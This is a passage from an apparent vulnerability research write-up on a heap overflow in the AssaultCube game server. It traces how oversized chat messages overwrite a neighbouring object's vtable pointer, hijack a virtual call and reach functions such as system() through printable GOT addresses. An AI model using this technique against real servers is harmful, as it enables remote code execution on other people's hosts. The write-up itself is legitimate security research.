<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/U9_75yxk2AY" frameborder="0" allowfullscreen=""></iframe></center>
<p>I should probably mention that it took a while before I realized I could do that. The bug clearly seemed useful, but at first I couldn’t find a good use for it, to the point that I set it aside and kept looking for other bugs, keeping in mind that I had this <em>card</em> to play when needed.
Glad I found this neat trick eventually.</p>
<p>As I said earlier, <code class="language-plaintext highlighter-rouge">messages</code> was the interesting vector because it’s the one that I could write data to, mostly using these <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2758">macros</a>.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define QUEUE_MSG \
{ \
if (cl->type == ST_TCPIP) \
while (curmsg < p.length()) \
cl->messages.add(p.buf[curmsg++]); \
}
#define QUEUE_BUF(body) \
{ \
if (cl->type == ST_TCPIP) \
{ \
curmsg = p.length(); \
{ \
body; \
} \
} \
}
#define QUEUE_INT(n) QUEUE_BUF(putint(cl->messages, n))
#define QUEUE_UINT(n) QUEUE_BUF(putuint(cl->messages, n))
#define QUEUE_STR(text) QUEUE_BUF(sendstring(text, cl->messages))
</span></code></pre></div></div>
<p>The interesting calls to these macros are at these cases of the event handler:</p>
<ol>
<li><a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2844">SV_TEXT</a> — Queues the sent text message.</li>
<li><a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L3617">default</a> — Queues any uncaught data from the client.</li>
</ol>
<p>Let’s start with sending a big text message that would overflow <code class="language-plaintext highlighter-rouge">messages</code>.<br />
This is useful for seeing which chunk of memory follows the buffer and whether it can be used for further exploitation. The actual allocated capacity before the overwrite is <code class="language-plaintext highlighter-rouge">0x20</code>, so as long as we write more than that, we should overflow the buffer.</p>
<p>I patched the client to send <code class="language-plaintext highlighter-rouge">aaaabbbb...AAAABBBB...</code> so that it’ll be easy to tell how our buffer is being “consumed” by the code.</p>
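<p>A pattern of this shape is easy to generate and to search. The following Python sketch is my own helper, not the code from the patched client, and the "leaked" bytes in the example are hypothetical.</p>

```python
import string


def make_pattern(width: int = 4) -> bytes:
    """Build b'aaaabbbb...zzzzAAAABBBB...ZZZZ' with `width` copies per letter."""
    letters = string.ascii_lowercase + string.ascii_uppercase
    return "".join(ch * width for ch in letters).encode("ascii")


def offset_of(pattern: bytes, leaked: bytes) -> int:
    """Return where `leaked` (bytes seen in a register or memory) starts, or -1."""
    return pattern.find(leaked)


pattern = make_pattern()
# Hypothetical example: suppose a crashed register held the bytes b"iiiijjjj".
example_offset = offset_of(pattern, b"iiiijjjj")
```

<p>Because every letter marks a distinct 4-byte slot, the letters that show up in a register or on the heap tell you which offset of the message landed there. Keep in mind that a debugger prints register values as integers, so the bytes appear in reverse order on a little-endian machine.</p>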
<center><iframe style="width: 720px; height: 400px; margin: 0.5rem" src="https://www.youtube.com/embed/lAu452kuy_0" frameborder="0" allowfullscreen=""></iframe></center>
<p>Wow.</p>
<p>Seems like we can already call a function of our choice.<br />
The <code class="language-plaintext highlighter-rouge">RAX</code> register is under our control and <code class="language-plaintext highlighter-rouge">RIP</code> is pointing at
<code class="language-plaintext highlighter-rouge">call qword ptr [rax + 0x40]</code></p>
<p>That’s very cool!
Let’s take a look at where this segfault occurs exactly.<br />
The writedemo <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L421">function</a>.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">writedemo</span><span class="p">(</span><span class="kt">int</span> <span class="n">chan</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">demorecord</span><span class="p">)</span>
<span class="k">return</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">stamp</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="n">gamemillis</span><span class="p">,</span> <span class="n">chan</span><span class="p">,</span> <span class="n">len</span><span class="p">};</span>
<span class="n">lilswap</span><span class="p">(</span><span class="n">stamp</span><span class="p">,</span> <span class="mi">3</span><span class="p">);</span>
<span class="n">demorecord</span><span class="o">-></span><span class="n">write</span><span class="p">(</span><span class="n">stamp</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">stamp</span><span class="p">));</span>
<span class="n">demorecord</span><span class="o">-></span><span class="n">write</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>What our overflow has done is overwrite the vtable pointer of <code class="language-plaintext highlighter-rouge">demorecord</code>.
This is possible since <code class="language-plaintext highlighter-rouge">demorecord</code> and <code class="language-plaintext highlighter-rouge">cl->messages</code> are adjacent chunks on the heap. If you’re unsure what vtables are and how dynamic dispatch works in C++, take a look <a href="https://pabloariasal.github.io/2017/06/10/understanding-virtual-tables/">here</a>.</p>
<p>The faulting instruction fetches the address of <code class="language-plaintext highlighter-rouge">write</code> from the vtable, so <code class="language-plaintext highlighter-rouge">RAX</code> is supposed to hold the vtable’s address.</p>
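<p>As a rough mental model, the dispatch can be simulated in Python with a dictionary standing in for memory. I am assuming the usual layout where the object's first 8 bytes hold its vtable pointer; every address below is made up for illustration, and only the <code class="language-plaintext highlighter-rouge">0x40</code> slot offset comes from the crash.</p>

```python
WRITE_SLOT = 0x40  # slot offset taken from `call qword ptr [rax + 0x40]`


def virtual_call_target(memory: dict, obj_addr: int) -> int:
    """Resolve the call target the way the faulting instruction would."""
    vtable_addr = memory[obj_addr]            # first 8 bytes of the object -> RAX
    return memory[vtable_addr + WRITE_SLOT]   # [rax + 0x40] -> function address


# All addresses below are made up for illustration.
memory = {
    0x1000: 0x2000,                 # object at 0x1000 stores its vtable pointer
    0x2000 + WRITE_SLOT: 0xAAAA,    # genuine vtable slot -> the real write()
    0x3000 + WRITE_SLOT: 0xBBBB,    # another table whose slot -> another function
}

before = virtual_call_target(memory, 0x1000)
memory[0x1000] = 0x3000             # the overflow replaces the vtable pointer
after = virtual_call_target(memory, 0x1000)
```

<p>Note the double indirection: we do not supply a function address directly, but an address at which a function pointer is stored <code class="language-plaintext highlighter-rouge">0x40</code> bytes further on. An address that is missing from the dictionary plays the role of the segfault.</p>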
<p>Let’s review the flow of execution that got us into <code class="language-plaintext highlighter-rouge">writedemo</code>.
In the <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L3810">serverslice</a> function, which is the main game loop, on each cycle (or tick) all inputs are read from the clients and a “world state” is built.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">event</span><span class="p">.</span><span class="n">type</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="n">ENET_EVENT_TYPE_CONNECT</span><span class="p">:</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="p">}</span>
<span class="k">case</span> <span class="n">ENET_EVENT_TYPE_RECEIVE</span><span class="p">:</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">cn</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int</span><span class="p">)(</span><span class="kt">size_t</span><span class="p">)</span><span class="n">event</span><span class="p">.</span><span class="n">peer</span><span class="o">-></span><span class="n">data</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">valid_client</span><span class="p">(</span><span class="n">cn</span><span class="p">))</span>
<span class="n">process</span><span class="p">(</span><span class="n">event</span><span class="p">.</span><span class="n">packet</span><span class="p">,</span> <span class="n">cn</span><span class="p">,</span> <span class="n">event</span><span class="p">.</span><span class="n">channelID</span><span class="p">);</span> <span class="c1">// Note the call to process.</span>
<span class="k">if</span> <span class="p">(</span><span class="n">event</span><span class="p">.</span><span class="n">packet</span><span class="o">-></span><span class="n">referenceCount</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">enet_packet_destroy</span><span class="p">(</span><span class="n">event</span><span class="p">.</span><span class="n">packet</span><span class="p">);</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">case</span> <span class="n">ENET_EVENT_TYPE_DISCONNECT</span><span class="p">:</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">sendworldstate</span><span class="p">();</span> <span class="c1">// Followed by a function that internally calls `buildworldstate`.</span>
<span class="p">...</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">sendworldstate</code> calls <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L110">buildworldstate</a>, which gathers the messages from all the clients and merges them into <code class="language-plaintext highlighter-rouge">worldstate.messages</code>.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="n">loopv</span><span class="p">(</span><span class="n">clients</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="k">if</span> <span class="p">(</span><span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">empty</span><span class="p">())</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">();</span>
<span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">SV_CLIENT</span><span class="p">);</span>
<span class="n">putint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">clientnum</span><span class="p">);</span>
<span class="n">putuint</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">,</span> <span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">());</span>
<span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">put</span><span class="p">(</span><span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">getbuf</span><span class="p">(),</span> <span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">());</span>
<span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msglen</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">()</span> <span class="o">-</span> <span class="n">pkt</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">msgoff</span><span class="p">;</span>
<span class="n">c</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">setsize</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="n">msize</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">length</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">msize</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">recordpacket</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">getbuf</span><span class="p">(),</span> <span class="n">msize</span><span class="p">);</span>
<span class="n">ucharbuf</span> <span class="n">p</span> <span class="o">=</span> <span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">reserve</span><span class="p">(</span><span class="n">msize</span><span class="p">);</span>
<span class="n">p</span><span class="p">.</span><span class="n">put</span><span class="p">(</span><span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">getbuf</span><span class="p">(),</span> <span class="n">msize</span><span class="p">);</span>
<span class="n">ws</span><span class="p">.</span><span class="n">messages</span><span class="p">.</span><span class="n">addbuf</span><span class="p">(</span><span class="n">p</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">...</span>
</code></pre></div></div>
<p>Afterwards, <code class="language-plaintext highlighter-rouge">worldstate.messages</code> is passed into <code class="language-plaintext highlighter-rouge">recordpacket</code>, which simply calls <code class="language-plaintext highlighter-rouge">writedemo</code> with the same arguments.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">recordpacket</span><span class="p">(</span><span class="kt">int</span> <span class="n">chan</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">recordpackets</span><span class="p">)</span>
<span class="n">writedemo</span><span class="p">(</span><span class="n">chan</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">recordpacket</span><span class="p">(</span><span class="kt">int</span> <span class="n">chan</span><span class="p">,</span> <span class="n">ENetPacket</span> <span class="o">*</span><span class="n">packet</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">recordpackets</span><span class="p">)</span>
<span class="n">writedemo</span><span class="p">(</span><span class="n">chan</span><span class="p">,</span> <span class="n">packet</span><span class="o">-></span><span class="n">data</span><span class="p">,</span> <span class="p">(</span><span class="kt">int</span><span class="p">)</span><span class="n">packet</span><span class="o">-></span><span class="n">dataLength</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If you were paying attention,
you may have noticed that not only do we overwrite <code class="language-plaintext highlighter-rouge">demorecord</code>’s vtable pointer,
but the data that is passed to <code class="language-plaintext highlighter-rouge">writedemo</code> also contains our text message.</p>
<p>Roughly,
<code class="language-plaintext highlighter-rouge">QUEUE_STR(text) -> cl.messages -> worldstate.messages -> writedemo(worldstate.messages) -> demorecord->write(worldstate.messages)</code></p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">writedemo</span><span class="p">(</span><span class="kt">int</span> <span class="n">chan</span><span class="p">,</span> <span class="kt">void</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
<span class="p">...</span>
<span class="n">demorecord</span><span class="o">-></span><span class="n">write</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>So, we can both control the function that is called, and even choose an argument to pass it! Neato’.</p>
<p><code class="language-plaintext highlighter-rouge">demorecord</code> itself is <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L643">initialized</a> only once at the start of the game and is of <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/stream.cpp#L474">type</a> <code class="language-plaintext highlighter-rouge">gzstream : stream</code></p>
<p>Let’s go back to the limitations for a second.
Because of the call to <code class="language-plaintext highlighter-rouge">filtertext</code> <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/server.cpp#L2833">here</a>, it is not possible to send a message containing unprintable characters, and the size of the message is limited to 260 bytes.</p>
<p>This is pretty problematic because it drastically reduces the leverage of this attack: in effect, it only allows us to pass printable pointers.</p>
<p>In order to deal with that, I wrote a <a href="https://github.com/elongl/AC/blob/research/egk/get_possibly_called_funcs.py">script</a> that returns all the <strong>GOT</strong> functions whose pointers are completely printable. Note that I had to limit the search to GOT functions because I needed a memory address that holds a pointer to a function, exactly like the vtable behaves. That’s why I couldn’t just call functions within the executable itself. The script returned the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Function | Address in ASCII
malloc: p}D
_ZTVN10__cxxabiv120__si_class_type_infoE: H]D
strstr: `D
isxdigit: (`D
socket: 0`D
_ZSt9terminatev: 8`D
recvmsg: @`D
accept: H`D
strtoul: P`D
fwrite_unlocked: X`D
strchr: ``D
uncompress: h`D
__cxa_begin_catch: p`D
strspn: x`D
perror: aD
system: (aD // Well, hello there
inflateInit2_: 0aD
gmtime: 8aD
openlog: @aD
__cxa_atexit: HaD
time: PaD
strcpy: XaD
_ZdlPv: `aD
select: haD
__isoc99_sscanf: paD
closelog: xaD
gethostbyaddr_r: bD
vfprintf: (bD
fread_unlocked: 0bD
shutdown: 8bD
tmpfile: @bD
putchar: HbD
strcmp: PbD
strtol: XbD
inflateReset: `bD
fprintf: hbD
tolower: pbD
backtrace: xbD
strcat: cD
setsockopt: (cD
remove: 0cD
__cxa_guard_acquire: 8cD
sqrtf: @cD
toupper: HcD
frexp: PcD
inet_pton: XcD
__cxa_pure_virtual: `cD
qsort: hcD
fwrite: pcD
close: xcD
</code></pre></div></div>
<p>Hold on…Is the address of <code class="language-plaintext highlighter-rouge">system</code> completely printable?</p>
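<p>It is easy to double-check by hand. The Python sketch below is not the author's script, just my own illustration of the encoding. I am assuming that the ASCII column shows the pointer's bytes in memory order (little-endian on x86-64), that the zero high bytes can be left out, and that "printable" means the range <code class="language-plaintext highlighter-rouge">0x20</code> to <code class="language-plaintext highlighter-rouge">0x7E</code>.</p>

```python
PRINTABLE = range(0x20, 0x7F)  # assumed definition of "printable"


def pointer_as_text(address: int):
    """Return the pointer's in-memory bytes as text if all are printable, else None."""
    raw = address.to_bytes(8, "little").rstrip(b"\x00")  # drop the zero high bytes
    if raw and all(b in PRINTABLE for b in raw):
        return raw.decode("ascii")
    return None


def text_as_pointer(text: str) -> int:
    """Inverse direction: read a listing entry back as an address."""
    return int.from_bytes(text.encode("ascii"), "little")


system_entry = text_as_pointer("(aD")   # the entry listed next to `system`
malloc_entry = text_as_pointer("p}D")   # the entry listed next to `malloc`
```

<p>Under those assumptions, <code class="language-plaintext highlighter-rouge">(aD</code> decodes to <code class="language-plaintext highlighter-rouge">0x446128</code>, and any address containing a byte outside the printable range (other than trailing zeros) is filtered out.</p>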
<p>Well, easy peasy: let’s just call <code class="language-plaintext highlighter-rouge">system</code>. Our text message is already passed as an argument to the function, so that’s it, we can run commands on the server’s host, right? You guessed it, of course not.</p>
<p>Let’s take a moment to discuss, in a very abstract way, how <em>methods</em> (or <em>member functions</em>) are called in C++. After all, <code class="language-plaintext highlighter-rouge">write</code> is a virtual method of demorecord.</p>
<p>A method is a function like any other, with the small caveat that it needs to be able to reference the object’s members as well. This is done via an implicit <code class="language-plaintext highlighter-rouge">this</code> argument.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">class</span> <span class="nc">Foo</span>
<span class="p">{</span>
<span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="n">text</span> <span class="o">=</span> <span class="s">"bar"</span><span class="p">;</span>
<span class="nl">public:</span>
<span class="kt">void</span> <span class="n">print</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">std</span><span class="o">::</span><span class="n">cout</span> <span class="o"><<</span> <span class="n">text</span> <span class="o"><<</span> <span class="n">std</span><span class="o">::</span><span class="n">endl</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Foo</span> <span class="n">foo</span><span class="p">;</span>
<span class="n">foo</span><span class="p">.</span><span class="n">print</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>
<p>If we were to debug this, we’d see that <code class="language-plaintext highlighter-rouge">foo.print()</code> actually loads <code class="language-plaintext highlighter-rouge">foo</code> into the first argument and jumps to <code class="language-plaintext highlighter-rouge">Foo::print</code>.</p>
<p>By the way, in Python it’s much clearer simply because it’s explicit: every method receives <code class="language-plaintext highlighter-rouge">self</code> as its first parameter.</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">class</span> <span class="nc">Foo</span><span class="p">:</span>
<span class="k">def</span> <span class="nf">bar</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">pass</span>
</code></pre></div></div>
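<p>To make the equivalence concrete, here is a minimal sketch (the class and method names are only for illustration) showing that calling a method on an instance is the same as calling the plain function and passing the object in by hand as the first argument.</p>

```python
class Foo:
    def __init__(self):
        self.text = "bar"

    def show(self):
        # `self` plays the role of C++'s implicit `this` pointer.
        return self.text


foo = Foo()

# The usual call syntax...
via_instance = foo.show()
# ...does the same thing as calling the function and passing the object explicitly.
via_class = Foo.show(foo)

print(via_instance, via_class)
```

<p>Both calls reach the same function with the same first argument; the dot syntax only hides it.</p>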
<p>Now that we’ve cleared this up, we can see why it won’t be possible to call <code class="language-plaintext highlighter-rouge">system</code> with our command: in the invocation <code class="language-plaintext highlighter-rouge">demorecord->write(data, len);</code> it is <code class="language-plaintext highlighter-rouge">demorecord</code> <strong>itself</strong> that is passed as the first argument,
not <code class="language-plaintext highlighter-rouge">data</code>. Unfortunately.</p>
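<p>The same constraint can be modeled in a few lines. This is only a toy model of virtual dispatch, not the real C++ ABI: <code class="language-plaintext highlighter-rouge">FakeObject</code>, <code class="language-plaintext highlighter-rouge">virtual_call</code>, <code class="language-plaintext highlighter-rouge">fake_system</code> and <code class="language-plaintext highlighter-rouge">uses_second_argument</code> are all hypothetical names. It shows that whatever function we plant in the vtable slot, the object lands in the first parameter and our data in the second.</p>

```python
class FakeObject:
    """Toy stand-in for a C++ object: just a table of function 'pointers'."""

    def __init__(self, vtable):
        self.vtable = vtable


def virtual_call(obj, slot, *args):
    # Models obj->slot(args...): the object is always passed in front of the
    # explicit arguments, exactly like the implicit `this`.
    return obj.vtable[slot](obj, *args)


def fake_system(*args):
    # Models system(const char *command): only the first argument is used.
    return ("system ran", args[0])


def uses_second_argument(*args):
    # Models any function whose interesting parameter is the second one.
    return ("second argument", args[1])


data = b"payload"

# Hijack the slot with a system-like function: it receives the object, not data.
demorecord = FakeObject({"write": fake_system})
result_system = virtual_call(demorecord, "write", data, len(data))

# Hijack it with a function that reads its second parameter: it receives data.
demorecord.vtable["write"] = uses_second_argument
result_second = virtual_call(demorecord, "write", data, len(data))

print(result_system[1] is demorecord, result_second[1])
```

<p>So the hijacked call is only useful with a target whose <em>second</em> parameter does something interesting with attacker-controlled bytes.</p>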
<p>But looking at the bright side, we can still call certain functions and control the second argument with printable characters. That has to be useful. Right?</p>
<p>After a lot of attempts, I couldn’t quite solve this puzzle, so I returned to the code and looked in different directions for a way to bypass the frustrating printable-characters-only limitation. That would let me call many more functions and pass pointers and whatnot as my arguments.</p>
<p>I revisited the <code class="language-plaintext highlighter-rouge">QUEUE</code> macros to look for different ways to write data to the <code class="language-plaintext highlighter-rouge">messages</code> vector. There were a lot of other places, but each of them wrote a relatively small buffer, like my position, which is about 3 integers, or a voice communication sound, which is a single integer, so those won’t trigger an overflow.</p>
<p>But then I realized that a client can send <strong>multiple events</strong> in a <strong>single process call</strong>!</p>
<p>So for instance, I’d be able to</p>
<ol>
<li>Change my name.</li>
<li>Update my location on the map.</li>
<li>Send a voice message.</li>
<li>Send a text message.</li>
</ol>
<p>And only <strong>then</strong> would process exit and all of these would be bundled into <code class="language-plaintext highlighter-rouge">worldstate.messages</code>. This is vital for the sake of writing binary data into <code class="language-plaintext highlighter-rouge">messages</code>.</p>
<p>I looked up all the places where <code class="language-plaintext highlighter-rouge">QUEUE_MSG</code> is being used, which is basically a macro that takes all the input read from the client up until the point it’s invoked, and adds it to <code class="language-plaintext highlighter-rouge">messages</code>.</p>
<p>Interestingly, one of the places it appears is in the <code class="language-plaintext highlighter-rouge">default</code> case of the client event handler which sort of behaves like a <em>flush</em> or emptying the buffer I’d say.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nl">default:</span>
<span class="p">{</span>
<span class="kt">int</span> <span class="n">size</span> <span class="o">=</span> <span class="n">msgsizelookup</span><span class="p">(</span><span class="n">type</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">size</span> <span class="o"><=</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">sender</span> <span class="o">>=</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">disconnect_client</span><span class="p">(</span><span class="n">sender</span><span class="p">,</span> <span class="n">DISC_TAGT</span><span class="p">);</span>
<span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">loopi</span><span class="p">(</span><span class="n">size</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="n">getint</span><span class="p">(</span><span class="n">p</span><span class="p">);</span> <span class="c1">// Read integers from the client.</span>
<span class="n">QUEUE_MSG</span><span class="p">;</span> <span class="c1">// Queue them into messages.</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>This is great because our data doesn’t affect or break anything, literally all it does is to get written into <code class="language-plaintext highlighter-rouge">messages</code>. Now what’s left to do is get size to be as big as we want so that not too much data is read, nor too little.</p>
<p>The <a href="https://github.com/assaultcube/AC/blob/v1.2.0.2/source/src/protocol.cpp#L350">msgsizelookup</a> function returns the size that a certain event is supposed to read. If the event was supposed to be caught as a case in the event handler, then <code class="language-plaintext highlighter-rouge">-1</code> is returned, which disconnects the client (as can be seen above) since that should never happen.</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="kt">int</span> <span class="n">msgsizes</span><span class="p">[]</span> <span class="o">=</span> <span class="c1">// size inclusive message token, 0 for variable or not-checked sizes</span>
<span class="p">{</span>
<span class="n">SV_SERVINFO</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="n">SV_WELCOME</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">SV_INITCLIENT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_POS</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_POSC</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_POSN</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_TEXT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_TEAMTEXT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_TEXTME</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_TEAMTEXTME</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_TEXTPRIVATE</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span>
<span class="n">SV_SHOOT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_EXPLODE</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_SUICIDE</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">SV_AKIMBO</span><span class="p">,</span> <span class="mi">2</span><span class="p">,</span> <span class="n">SV_RELOAD</span><span class="p">,</span> <span class="mi">3</span><span class="p">,</span> <span class="n">SV_AUTHT</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_AUTHREQ</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_AUTHTRY</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_AUTHANS</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">SV_AUTHCHAL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span>
<span class="p">...</span> <span class="o">-</span> <span class="mi">1</span><span class="p">};</span>
<span class="kt">int</span> <span class="nf">msgsizelookup</span><span class="p">(</span><span class="kt">int</span> <span class="n">msg</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">static</span> <span class="kt">int</span> <span class="n">sizetable</span><span class="p">[</span><span class="n">SV_NUM</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span><span class="o">-</span><span class="mi">1</span><span class="p">};</span>
<span class="k">if</span> <span class="p">(</span><span class="n">sizetable</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o"><</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">memset</span><span class="p">(</span><span class="n">sizetable</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">sizetable</span><span class="p">));</span>
<span class="k">for</span> <span class="p">(</span><span class="k">const</span> <span class="kt">int</span> <span class="o">*</span><span class="n">p</span> <span class="o">=</span> <span class="n">msgsizes</span><span class="p">;</span> <span class="o">*</span><span class="n">p</span> <span class="o">>=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">p</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">)</span>
<span class="n">sizetable</span><span class="p">[</span><span class="n">p</span><span class="p">[</span><span class="mi">0</span><span class="p">]]</span> <span class="o">=</span> <span class="n">p</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="p">}</span>
